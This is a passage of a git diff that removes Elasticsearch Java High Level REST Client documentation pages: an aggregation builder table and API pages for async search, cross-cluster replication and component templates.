{ref}/search-aggregations-pipeline-inference-bucket-aggregation.html[Inference] | 
{javadoc-client}/analytics/InferencePipelineAggregationBuilder.html[InferencePipelineAggregationBuilder] | None -| {ref}/search-aggregations-pipeline-max-bucket-aggregation.html[Max Bucket] | {agg-ref}/pipeline/MaxBucketPipelineAggregationBuilder.html[MaxBucketPipelineAggregationBuilder] | {agg-ref}/PipelineAggregatorBuilders.html#maxBucket-java.lang.String-java.lang.String-[PipelineAggregatorBuilders.maxBucket()] -| {ref}/search-aggregations-pipeline-min-bucket-aggregation.html[Min Bucket] | {agg-ref}/pipeline/MinBucketPipelineAggregationBuilder.html[MinBucketPipelineAggregationBuilder] | {agg-ref}/PipelineAggregatorBuilders.html#minBucket-java.lang.String-java.lang.String-[PipelineAggregatorBuilders.minBucket()] -| {ref}/search-aggregations-pipeline-sum-bucket-aggregation.html[Sum Bucket] | {agg-ref}/pipeline/SumBucketPipelineAggregationBuilder.html[SumBucketPipelineAggregationBuilder] | {agg-ref}/PipelineAggregatorBuilders.html#sumBucket-java.lang.String-java.lang.String-[PipelineAggregatorBuilders.sumBucket()] -| {ref}/search-aggregations-pipeline-stats-bucket-aggregation.html[Stats Bucket] | {agg-ref}/pipeline/StatsBucketPipelineAggregationBuilder.html[StatsBucketPipelineAggregationBuilder] | {agg-ref}/PipelineAggregatorBuilders.html#statsBucket-java.lang.String-java.lang.String-[PipelineAggregatorBuilders.statsBucket()] -| {ref}/search-aggregations-pipeline-extended-stats-bucket-aggregation.html[Extended Stats Bucket] | {agg-ref}/pipeline/ExtendedStatsBucketPipelineAggregationBuilder.html[ExtendedStatsBucketPipelineAggregationBuilder] | {agg-ref}/PipelineAggregatorBuilders.html#extendedStatsBucket-java.lang.String-java.lang.String-[PipelineAggregatorBuilders.extendedStatsBucket()] -| {ref}/search-aggregations-pipeline-percentiles-bucket-aggregation.html[Percentiles Bucket] | {agg-ref}/pipeline/PercentilesBucketPipelineAggregationBuilder.html[PercentilesBucketPipelineAggregationBuilder] | {agg-ref}/PipelineAggregatorBuilders.html#percentilesBucket-java.lang.String-java.lang.String-[PipelineAggregatorBuilders.percentilesBucket()] -| {ref}/search-aggregations-pipeline-movavg-aggregation.html[Moving Average] | {agg-ref}/pipeline/MovAvgPipelineAggregationBuilder.html[MovAvgPipelineAggregationBuilder] | {agg-ref}/PipelineAggregatorBuilders.html#movingAvg-java.lang.String-java.lang.String-[PipelineAggregatorBuilders.movingAvg()] -| {ref}/search-aggregations-pipeline-cumulative-sum-aggregation.html[Cumulative Sum] | {agg-ref}/pipeline/CumulativeSumPipelineAggregationBuilder.html[CumulativeSumPipelineAggregationBuilder] | {agg-ref}/PipelineAggregatorBuilders.html#cumulativeSum-java.lang.String-java.lang.String-[PipelineAggregatorBuilders.cumulativeSum()] -| {ref}/search-aggregations-pipeline-bucket-script-aggregation.html[Bucket Script] | {agg-ref}/pipeline/BucketScriptPipelineAggregationBuilder.html[BucketScriptPipelineAggregationBuilder] | {agg-ref}/PipelineAggregatorBuilders.html#bucketScript-java.lang.String-java.util.Map-org.elasticsearch.script.Script-[PipelineAggregatorBuilders.bucketScript()] -| {ref}/search-aggregations-pipeline-bucket-selector-aggregation.html[Bucket Selector] | {agg-ref}/pipeline/BucketSelectorPipelineAggregationBuilder.html[BucketSelectorPipelineAggregationBuilder] | {agg-ref}/PipelineAggregatorBuilders.html#bucketSelector-java.lang.String-java.util.Map-org.elasticsearch.script.Script-[PipelineAggregatorBuilders.bucketSelector()] -| {ref}/search-aggregations-pipeline-serialdiff-aggregation.html[Serial Differencing] | 
{agg-ref}/pipeline/SerialDiffPipelineAggregationBuilder.html[SerialDiffPipelineAggregationBuilder] | {agg-ref}/PipelineAggregatorBuilders.html#diff-java.lang.String-java.lang.String-[PipelineAggregatorBuilders.diff()] -|====== - -==== Matrix Aggregations -[options="header"] -|====== -| Aggregation | AggregationBuilder Class | Method in MatrixStatsAggregationBuilders -| {ref}/search-aggregations-matrix-stats-aggregation.html[Matrix Stats] | {matrixstats-ref}/matrix/stats/MatrixStatsAggregationBuilder.html[MatrixStatsAggregationBuilder] | {matrixstats-ref}/MatrixStatsAggregationBuilders.html#matrixStats-java.lang.String-[MatrixStatsAggregationBuilders.matrixStats()] -|====== diff --git a/docs/java-rest/high-level/asyncsearch/delete.asciidoc b/docs/java-rest/high-level/asyncsearch/delete.asciidoc deleted file mode 100644 index f38961fe28c..00000000000 --- a/docs/java-rest/high-level/asyncsearch/delete.asciidoc +++ /dev/null @@ -1,68 +0,0 @@ --- -:api: asyncsearch-delete -:request: DeleteAsyncSearchRequest -:response: AcknowledgedResponse --- - -[role="xpack"] -[id="{upid}-{api}"] -=== Delete Async Search API - -[id="{upid}-{api}-request"] -==== Request - -A +{request}+ allows deleting a running asynchronous search task using -its id. Required arguments are the `id` of a running search: - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests-file}[{api}-request] --------------------------------------------------- - -[id="{upid}-{api}-sync"] -==== Synchronous Execution - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests-file}[{api}-execute] --------------------------------------------------- -<1> Execute the request and get back the response as an +{response}+ object. - -[id="{upid}-{api}-async"] -==== Asynchronous Execution - -The asynchronous execution of a +{request}+ allows to use an -`ActionListener` to be called back when the submit request returns: - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests-file}[{api}-execute-async] --------------------------------------------------- -<1> The +{request}+ to execute and the `ActionListener` to use when -the execution completes - -The asynchronous method does not block and returns immediately. Once it is -completed the `ActionListener` is called back using the `onResponse` method -if the execution successfully completed or using the `onFailure` method if -it failed. - -A typical listener for +{response}+ looks like: - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests-file}[{api}-listener] --------------------------------------------------- -<1> Called when the execution is successfully completed. The response is -provided as an argument -<2> Called in case of failure. The raised exception is provided as an argument - -[id="{upid}-{api}-response"] -==== Response - -The returned +{response}+ indicates the acknowledgement of the request: - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests-file}[{api}-response] --------------------------------------------------- -<1> `isAcknowledged` was the deletion request acknowledged or not. 
\ No newline at end of file diff --git a/docs/java-rest/high-level/asyncsearch/get.asciidoc b/docs/java-rest/high-level/asyncsearch/get.asciidoc deleted file mode 100644 index 531c341d64b..00000000000 --- a/docs/java-rest/high-level/asyncsearch/get.asciidoc +++ /dev/null @@ -1,87 +0,0 @@ --- -:api: asyncsearch-get -:request: GetAsyncSearchRequest -:response: AsyncSearchResponse --- - -[role="xpack"] -[id="{upid}-{api}"] -=== Get Async Search API - -[id="{upid}-{api}-request"] -==== Request - -A +{request}+ allows to get a running asynchronous search task by -its id. Required arguments are the `id` of a running async search: - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests-file}[{api}-request] --------------------------------------------------- - -==== Optional arguments -The following arguments can optionally be provided: - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests-file}[{api}-request-arguments] --------------------------------------------------- -<1> The minimum time that the request should wait before -returning a partial result (defaults to no wait). -<2> The expiration time of the request (defaults to none). - - -[id="{upid}-{api}-sync"] -==== Synchronous Execution - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests-file}[{api}-execute] --------------------------------------------------- -<1> Execute the request and get back the response as an +{response}+ object. - -[id="{upid}-{api}-async"] -==== Asynchronous Execution - -The asynchronous execution of a +{request}+ allows to use an -`ActionListener` to be called back when the submit request returns: - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests-file}[{api}-execute-async] --------------------------------------------------- -<1> The +{request}+ to execute and the `ActionListener` to use when -the execution completes - -The asynchronous method does not block and returns immediately. Once it is -completed the `ActionListener` is called back using the `onResponse` method -if the execution successfully completed or using the `onFailure` method if -it failed. - -A typical listener for +{response}+ looks like: - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests-file}[{api}-listener] --------------------------------------------------- -<1> Called when the execution is successfully completed. The response is -provided as an argument -<2> Called in case of failure. 
The raised exception is provided as an argument - -[id="{upid}-{api}-response"] -==== Response - -The returned +{response}+ allows to retrieve information about the executed - operation as follows: - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests-file}[{api}-response] --------------------------------------------------- -<1> The `SearchResponse`, or `null` if not available yet -<2> The id of the async search request, `null` if the response isn't stored -<3> `true` when the response contains partial results -<4> `true` when the search is still running -<5> The time the response was created (millis since epoch) -<6> The time the response expires (millis since epoch) -<7> Get failure reasons or `null` for no failures diff --git a/docs/java-rest/high-level/asyncsearch/submit.asciidoc b/docs/java-rest/high-level/asyncsearch/submit.asciidoc deleted file mode 100644 index cfe78f1d121..00000000000 --- a/docs/java-rest/high-level/asyncsearch/submit.asciidoc +++ /dev/null @@ -1,94 +0,0 @@ --- -:api: asyncsearch-submit -:request: SubmitAsyncSearchRequest -:response: AsyncSearchResponse --- - -[role="xpack"] -[id="{upid}-{api}"] -=== Submit Async Search API - -[id="{upid}-{api}-request"] -==== Request - -A +{request}+ allows to submit an asynchronous search task to -the cluster. Required arguments are the `SearchSourceBuilder` defining -the search and the target indices: - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests-file}[{api}-request] --------------------------------------------------- -<1> The definition of the search to run -<2> The target indices for the search - -==== Optional arguments -The following arguments can optionally be provided: - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests-file}[{api}-request-arguments] --------------------------------------------------- -<1> The minimum time that the request should wait before -returning a partial result (defaults to 1 second). -<2> The expiration time of the request (defaults to 5 days). -<3> Controls whether the results should be stored if the request -completed within the provided `wait_for_completion` time (default: false) - -[id="{upid}-{api}-sync"] -==== Synchronous Execution - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests-file}[{api}-execute] --------------------------------------------------- -<1> Execute the request and get back the response as an +{response}+ object. - -[id="{upid}-{api}-async"] -==== Asynchronous Execution - -The asynchronous execution of a +{request}+ allows to use an -`ActionListener` to be called back when the submit request returns. Note -that this is does not concern the execution of the submitted search request, -which always executes asynchronously. The listener, however, waits for the -submit request itself to come back: - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests-file}[{api}-execute-async] --------------------------------------------------- -<1> The +{request}+ to execute and the `ActionListener` to use when -the execution completes - -The asynchronous method does not block and returns immediately. 
Once it is -completed the `ActionListener` is called back using the `onResponse` method -if the execution successfully completed or using the `onFailure` method if -it failed. - -A typical listener for +{response}+ looks like: - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests-file}[{api}-listener] --------------------------------------------------- -<1> Called when the execution is successfully completed. The response is -provided as an argument -<2> Called in case of failure. The raised exception is provided as an argument - -[id="{upid}-{api}-response"] -==== Response - -The returned +{response}+ allows to retrieve information about the executed - operation as follows: - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests-file}[{api}-response] --------------------------------------------------- -<1> The `SearchResponse`, or `null` if not available yet -<2> The id of the async search request, `null` if the response isn't stored -<3> `true` when the response contains partial results -<4> `true` when the search is still running -<5> The time the response was created (millis since epoch) -<6> The time the response expires (millis since epoch) -<7> Get failure reasons or `null` for no failures diff --git a/docs/java-rest/high-level/ccr/delete_auto_follow_pattern.asciidoc b/docs/java-rest/high-level/ccr/delete_auto_follow_pattern.asciidoc deleted file mode 100644 index 49aee815b89..00000000000 --- a/docs/java-rest/high-level/ccr/delete_auto_follow_pattern.asciidoc +++ /dev/null @@ -1,32 +0,0 @@ --- -:api: ccr-delete-auto-follow-pattern -:request: DeleteAutoFollowPatternRequest -:response: AcknowledgedResponse --- -[role="xpack"] -[id="{upid}-{api}"] -=== Delete Auto Follow Pattern API - -[id="{upid}-{api}-request"] -==== Request - -The Delete Auto Follow Pattern API allows you to delete an auto follow pattern. - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests-file}[{api}-request] --------------------------------------------------- -<1> The name of the auto follow pattern to delete. - -[id="{upid}-{api}-response"] -==== Response - -The returned +{response}+ indicates if the delete auto follow pattern request was received. - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests-file}[{api}-response] --------------------------------------------------- -<1> Whether or not the delete auto follow pattern request was acknowledged. - -include::../execution.asciidoc[] diff --git a/docs/java-rest/high-level/ccr/forget_follower.asciidoc b/docs/java-rest/high-level/ccr/forget_follower.asciidoc deleted file mode 100644 index b889993a4e9..00000000000 --- a/docs/java-rest/high-level/ccr/forget_follower.asciidoc +++ /dev/null @@ -1,45 +0,0 @@ --- -:api: ccr-forget-follower -:request: ForgetFollowerRequest -:response: BroadcastResponse --- -[role="xpack"] -[id="{upid}-{api}"] -=== Forget Follower API - -[id="{upid}-{api}-request"] -==== Request - -The Forget Follower API allows you to manually remove the follower retention -leases from the leader. Note that these retention leases are automatically -managed by the following index. This API exists only for cases when invoking -the unfollow API on the follower index is unable to remove the follower -retention leases. 
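As a rough, hypothetical sketch (not the snippet used by the documentation tests), the request can be thought of as carrying the five values described by the callouts below; all names and the UUID here are placeholders, and the exact constructor signature should be verified against the client version in use:

[source,java]
--------------------------------------------------
// Placeholder values only; the follower index UUID would normally be read
// from the index stats of the follower index.
ForgetFollowerRequest request = new ForgetFollowerRequest(
        "follower-cluster",     // cluster containing the follower index
        "follower-index",       // follower index name
        "follower-index-uuid",  // UUID of the follower index
        "remote-cluster",       // alias of the remote cluster with the leader index
        "leader-index");        // leader index name

BroadcastResponse response = client.ccr()
        .forgetFollower(request, RequestOptions.DEFAULT);
--------------------------------------------------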
- -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests-file}[{api}-request] --------------------------------------------------- -<1> The name of the cluster containing the follower index. -<2> The name of the follower index. -<3> The UUID of the follower index (can be obtained from index stats). -<4> The alias of the remote cluster containing the leader index. -<5> The name of the leader index. - -[id="{upid}-{api}-response"] -==== Response - -The returned +{response}+ indicates if the response was successful. - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests-file}[{api}-response] --------------------------------------------------- -<1> The high-level shards summary. -<2> The total number of shards the request was executed on. -<3> The total number of shards the request was successful on. -<4> The total number of shards the request was skipped on (should always be zero). -<5> The total number of shards the request failed on. -<6> The shard-level failures. - -include::../execution.asciidoc[] diff --git a/docs/java-rest/high-level/ccr/get_auto_follow_pattern.asciidoc b/docs/java-rest/high-level/ccr/get_auto_follow_pattern.asciidoc deleted file mode 100644 index 98c9e541019..00000000000 --- a/docs/java-rest/high-level/ccr/get_auto_follow_pattern.asciidoc +++ /dev/null @@ -1,35 +0,0 @@ --- -:api: ccr-get-auto-follow-pattern -:request: GetAutoFollowPatternRequest -:response: GetAutoFollowPatternResponse --- -[role="xpack"] -[id="{upid}-{api}"] -=== Get Auto Follow Pattern API - -[id="{upid}-{api}-request"] -==== Request - -The Get Auto Follow Pattern API allows you to get a specified auto follow pattern -or all auto follow patterns. - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests-file}[{api}-request] --------------------------------------------------- -<1> The name of the auto follow pattern to get. - Use the default constructor to get all auto follow patterns. - -[id="{upid}-{api}-response"] -==== Response - -The returned +{response}+ includes the requested auto follow pattern or -all auto follow patterns if default constructor or request class was used. - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests-file}[{api}-response] --------------------------------------------------- -<1> Get the requested pattern from the list of returned patterns - -include::../execution.asciidoc[] diff --git a/docs/java-rest/high-level/ccr/get_follow_info.asciidoc b/docs/java-rest/high-level/ccr/get_follow_info.asciidoc deleted file mode 100644 index 70a71c1c90b..00000000000 --- a/docs/java-rest/high-level/ccr/get_follow_info.asciidoc +++ /dev/null @@ -1,35 +0,0 @@ --- -:api: ccr-get-follow-info -:request: FollowInfoRequest -:response: FollowInfoResponse --- -[role="xpack"] -[id="{upid}-{api}"] -=== Get Follow Info API - - -[id="{upid}-{api}-request"] -==== Request - -The Get Follow Info API allows you to get follow information (parameters and status) for specific follower indices. - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests-file}[{api}-request] --------------------------------------------------- -<1> The follower index to get follow information for. 
- -[id="{upid}-{api}-response"] -==== Response - -The returned +{response}+ includes follow information for the specified follower indices - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests-file}[{api}-response] --------------------------------------------------- -<1> The follow information for specified follower indices. - -include::../execution.asciidoc[] - - diff --git a/docs/java-rest/high-level/ccr/get_follow_stats.asciidoc b/docs/java-rest/high-level/ccr/get_follow_stats.asciidoc deleted file mode 100644 index a510a53b70c..00000000000 --- a/docs/java-rest/high-level/ccr/get_follow_stats.asciidoc +++ /dev/null @@ -1,35 +0,0 @@ --- -:api: ccr-get-follow-stats -:request: FollowStatsRequest -:response: FollowStatsResponse --- -[role="xpack"] -[id="{upid}-{api}"] -=== Get Follow Stats API - - -[id="{upid}-{api}-request"] -==== Request - -The Get Follow Stats API allows you to get follow statistics for specific follower indices. - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests-file}[{api}-request] --------------------------------------------------- -<1> The follower index to get follow statistics for. - -[id="{upid}-{api}-response"] -==== Response - -The returned +{response}+ includes follow statistics for the specified follower indices - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests-file}[{api}-response] --------------------------------------------------- -<1> The follow stats for specified follower indices. - -include::../execution.asciidoc[] - - diff --git a/docs/java-rest/high-level/ccr/get_stats.asciidoc b/docs/java-rest/high-level/ccr/get_stats.asciidoc deleted file mode 100644 index 6c8502302fc..00000000000 --- a/docs/java-rest/high-level/ccr/get_stats.asciidoc +++ /dev/null @@ -1,37 +0,0 @@ --- -:api: ccr-get-stats -:request: CcrStatsRequest -:response: CcrStatsResponse --- -[role="xpack"] -[id="{upid}-{api}"] -=== Get CCR Stats API - - -[id="{upid}-{api}-request"] -==== Request - -The Get CCR Stats API allows you to get statistics about index following and auto following. - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests-file}[{api}-request] --------------------------------------------------- -<1> The request accepts no parameters. - -[id="{upid}-{api}-response"] -==== Response - -The returned +{response}+ always includes index follow statistics of all follow indices and -auto follow statistics. - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests-file}[{api}-response] --------------------------------------------------- -<1> The follow stats of active follower indices. -<2> The auto follow stats of the cluster that has been queried. 
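Putting it together, a minimal sketch of the call might look as follows (assuming a `RestHighLevelClient` named `client`; the accessor names mirror the callouts above and may vary slightly between client versions):

[source,java]
--------------------------------------------------
// The CCR stats request takes no parameters
CcrStatsRequest request = new CcrStatsRequest();
CcrStatsResponse response = client.ccr()
        .getCcrStats(request, RequestOptions.DEFAULT);

// Follow stats for active follower indices and cluster-wide auto follow stats
IndicesFollowStats followStats = response.getIndicesFollowStats();
AutoFollowStats autoFollowStats = response.getAutoFollowStats();
--------------------------------------------------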
- -include::../execution.asciidoc[] - - diff --git a/docs/java-rest/high-level/ccr/pause_auto_follow_pattern.asciidoc b/docs/java-rest/high-level/ccr/pause_auto_follow_pattern.asciidoc deleted file mode 100644 index 2d40e4e9c4a..00000000000 --- a/docs/java-rest/high-level/ccr/pause_auto_follow_pattern.asciidoc +++ /dev/null @@ -1,32 +0,0 @@ --- -:api: ccr-pause-auto-follow-pattern -:request: PauseAutoFollowPatternRequest -:response: AcknowledgedResponse --- -[role="xpack"] -[id="{upid}-{api}"] -=== Pause Auto Follow Pattern API - -[id="{upid}-{api}-request"] -==== Request - -The Pause Auto Follow Pattern API allows you to pause an existing auto follow pattern. - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests-file}[{api}-request] --------------------------------------------------- -<1> The name of the auto follow pattern. - -[id="{upid}-{api}-response"] -==== Response - -The returned +{response}+ indicates if the pause auto follow pattern request was received. - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests-file}[{api}-response] --------------------------------------------------- -<1> Whether or not the pause auto follow pattern request was acknowledged. - -include::../execution.asciidoc[] diff --git a/docs/java-rest/high-level/ccr/pause_follow.asciidoc b/docs/java-rest/high-level/ccr/pause_follow.asciidoc deleted file mode 100644 index 70694da0e81..00000000000 --- a/docs/java-rest/high-level/ccr/pause_follow.asciidoc +++ /dev/null @@ -1,35 +0,0 @@ --- -:api: ccr-pause-follow -:request: PauseFollowRequest -:response: AcknowledgedResponse --- -[role="xpack"] -[id="{upid}-{api}"] -=== Pause Follow API - - -[id="{upid}-{api}-request"] -==== Request - -The Pause Follow API allows you to pause following by follow index name. - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests-file}[{api}-request] --------------------------------------------------- -<1> The name of follow index. - -[id="{upid}-{api}-response"] -==== Response - -The returned +{response}+ indicates if the pause follow request was received. - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests-file}[{api}-response] --------------------------------------------------- -<1> Whether or not the pause follow was acknowledge. - -include::../execution.asciidoc[] - - diff --git a/docs/java-rest/high-level/ccr/put_auto_follow_pattern.asciidoc b/docs/java-rest/high-level/ccr/put_auto_follow_pattern.asciidoc deleted file mode 100644 index a57b26738a4..00000000000 --- a/docs/java-rest/high-level/ccr/put_auto_follow_pattern.asciidoc +++ /dev/null @@ -1,38 +0,0 @@ --- -:api: ccr-put-auto-follow-pattern -:request: PutAutoFollowPatternRequest -:response: AcknowledgedResponse --- -[role="xpack"] -[id="{upid}-{api}"] -=== Put Auto Follow Pattern API - -[id="{upid}-{api}-request"] -==== Request - -The Put Auto Follow Pattern API allows you to store auto follow patterns in order -to automatically follow leader indices in a remote clusters matching certain -index name patterns. - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests-file}[{api}-request] --------------------------------------------------- -<1> The name of the auto follow pattern. 
-<2> The name of the remote cluster.
-<3> The leader index patterns.
-<4> The pattern used to create the follower index.
-<5> The settings overrides for the follower index.
-
-[id="{upid}-{api}-response"]
-==== Response
-
-The returned +{response}+ indicates if the put auto follow pattern request was received.
-
-["source","java",subs="attributes,callouts,macros"]
---------------------------------------------------
-include-tagged::{doc-tests-file}[{api}-response]
---------------------------------------------------
-<1> Whether or not the put auto follow pattern request was acknowledged.
-
-include::../execution.asciidoc[]
diff --git a/docs/java-rest/high-level/ccr/put_follow.asciidoc b/docs/java-rest/high-level/ccr/put_follow.asciidoc
deleted file mode 100644
index 68b0d4fbddc..00000000000
--- a/docs/java-rest/high-level/ccr/put_follow.asciidoc
+++ /dev/null
@@ -1,42 +0,0 @@
---
-:api: ccr-put-follow
-:request: PutFollowRequest
-:response: PutFollowResponse
---
-[role="xpack"]
-[id="{upid}-{api}"]
-=== Put Follow API
-
-
-[id="{upid}-{api}-request"]
-==== Request
-
-The Put Follow API creates a follower index and makes that index follow a leader index.
-
-["source","java",subs="attributes,callouts,macros"]
---------------------------------------------------
-include-tagged::{doc-tests-file}[{api}-request]
---------------------------------------------------
-<1> The name of the remote cluster alias.
-<2> The name of the leader index in the remote cluster.
-<3> The name of the follower index that gets created as part of the put follow API call.
-<4> The number of active shard copies to wait for before the put follow API returns a
-response, as an `ActiveShardCount`.
-<5> The settings overrides for the follower index.
-
-[id="{upid}-{api}-response"]
-==== Response
-
-The returned +{response}+ indicates if the put follow request was received.
-
-["source","java",subs="attributes,callouts,macros"]
---------------------------------------------------
-include-tagged::{doc-tests-file}[{api}-response]
---------------------------------------------------
-<1> Whether the follower index was created.
-<2> Whether the follower shards are started.
-<3> Whether the follower index started following the leader index.
-
-include::../execution.asciidoc[]
-
-
diff --git a/docs/java-rest/high-level/ccr/resume_auto_follow_pattern.asciidoc b/docs/java-rest/high-level/ccr/resume_auto_follow_pattern.asciidoc
deleted file mode 100644
index 8bc24ead277..00000000000
--- a/docs/java-rest/high-level/ccr/resume_auto_follow_pattern.asciidoc
+++ /dev/null
@@ -1,33 +0,0 @@
---
-:api: ccr-resume-auto-follow-pattern
-:request: ResumeAutoFollowPatternRequest
-:response: AcknowledgedResponse
---
-[role="xpack"]
-[id="{upid}-{api}"]
-=== Resume Auto Follow Pattern API
-
-[id="{upid}-{api}-request"]
-==== Request
-
-The Resume Auto Follow Pattern API allows you to resume the activity
-of a paused auto follow pattern.
-
-["source","java",subs="attributes,callouts,macros"]
---------------------------------------------------
-include-tagged::{doc-tests-file}[{api}-request]
---------------------------------------------------
-<1> The name of the auto follow pattern.
-
-[id="{upid}-{api}-response"]
-==== Response
-
-The returned +{response}+ indicates if the resume auto follow pattern request was received.
- -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests-file}[{api}-response] --------------------------------------------------- -<1> Whether or not the resume auto follow pattern request was acknowledged. - -include::../execution.asciidoc[] diff --git a/docs/java-rest/high-level/ccr/resume_follow.asciidoc b/docs/java-rest/high-level/ccr/resume_follow.asciidoc deleted file mode 100644 index e30f83115fa..00000000000 --- a/docs/java-rest/high-level/ccr/resume_follow.asciidoc +++ /dev/null @@ -1,35 +0,0 @@ --- -:api: ccr-resume-follow -:request: ResumeFollowRequest -:response: AcknowledgedResponse --- -[role="xpack"] -[id="{upid}-{api}"] -=== Resume Follow API - - -[id="{upid}-{api}-request"] -==== Request - -The Resume Follow API allows you to resume following a follower index that has been paused. - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests-file}[{api}-request] --------------------------------------------------- -<1> The name of follower index. - -[id="{upid}-{api}-response"] -==== Response - -The returned +{response}+ indicates if the resume follow request was received. - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests-file}[{api}-response] --------------------------------------------------- -<1> Whether or not the resume follow was acknowledged. - -include::../execution.asciidoc[] - - diff --git a/docs/java-rest/high-level/ccr/unfollow.asciidoc b/docs/java-rest/high-level/ccr/unfollow.asciidoc deleted file mode 100644 index 946a2c6e618..00000000000 --- a/docs/java-rest/high-level/ccr/unfollow.asciidoc +++ /dev/null @@ -1,36 +0,0 @@ --- -:api: ccr-unfollow -:request: UnfollowRequest -:response: AcknowledgedResponse --- -[role="xpack"] -[id="{upid}-{api}"] -=== Unfollow API - - -[id="{upid}-{api}-request"] -==== Request - -The Unfollow API allows you to unfollow a follower index and make it a regular index. -Note that the follower index needs to be paused and the follower index needs to be closed. - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests-file}[{api}-request] --------------------------------------------------- -<1> The name of follow index to unfollow. - -[id="{upid}-{api}-response"] -==== Response - -The returned +{response}+ indicates if the unfollow request was received. - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests-file}[{api}-response] --------------------------------------------------- -<1> Whether or not the unfollow was acknowledge. - -include::../execution.asciidoc[] - - diff --git a/docs/java-rest/high-level/cluster/delete_component_template.asciidoc b/docs/java-rest/high-level/cluster/delete_component_template.asciidoc deleted file mode 100644 index 9655123d9a0..00000000000 --- a/docs/java-rest/high-level/cluster/delete_component_template.asciidoc +++ /dev/null @@ -1,41 +0,0 @@ --- -:api: delete-component-template -:request: DeleteComponentTemplateRequest -:response: AcknowledgedResponse --- - -[id="{upid}-{api}"] -=== Delete Component Template API - -[id="{upid}-{api}-request"] -==== Request - -The Delete Component Template API allows you to delete a component template. 
- -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests-file}[{api}-request] --------------------------------------------------- -<1> The name of the component template to delete. - -=== Optional arguments -The following arguments can optionally be provided: - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests-file}[{api}-request-masterTimeout] --------------------------------------------------- -<1> Timeout to connect to the master node as a `TimeValue` - -[id="{upid}-{api}-response"] -==== Response - -The returned +{response}+ indicates if the delete component template request was received. - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests-file}[{api}-response] --------------------------------------------------- -<1> Whether or not the delete component template request was acknowledged. - -include::../execution.asciidoc[] diff --git a/docs/java-rest/high-level/cluster/get_component_template.asciidoc b/docs/java-rest/high-level/cluster/get_component_template.asciidoc deleted file mode 100644 index f112431b0c2..00000000000 --- a/docs/java-rest/high-level/cluster/get_component_template.asciidoc +++ /dev/null @@ -1,42 +0,0 @@ --- -:api: get-component-templates -:request: GetComponentTemplatesRequest -:response: GetComponentTemplatesResponse --- - -[id="{upid}-{api}"] -=== Get Component Templates API - -The Get Component Templates API allows to retrieve information about one or more component templates. - -[id="{upid}-{api}-request"] -==== Get Component Templates Request - -A +{request}+ specifies one component template name to retrieve. -To return all component templates omit the name altogether. - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests-file}[{api}-request] --------------------------------------------------- -<1> A single component template name - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests-file}[{api}-request-masterTimeout] --------------------------------------------------- -<1> Timeout to connect to the master node as a `TimeValue` -<2> Timeout to connect to the master node as a `String` - -include::../execution.asciidoc[] - -[id="{upid}-{api}-response"] -==== Get Component Templates Response - -The returned +{response}+ consists a map of component template names and their corresponding definition. - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests-file}[{api}-response] --------------------------------------------------- -<1> A map of matching component template names and the corresponding definitions diff --git a/docs/java-rest/high-level/cluster/get_settings.asciidoc 